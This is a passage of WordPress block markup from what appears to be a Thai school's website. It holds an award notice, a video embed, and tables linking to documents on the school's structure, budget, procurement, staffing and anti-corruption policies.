kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a 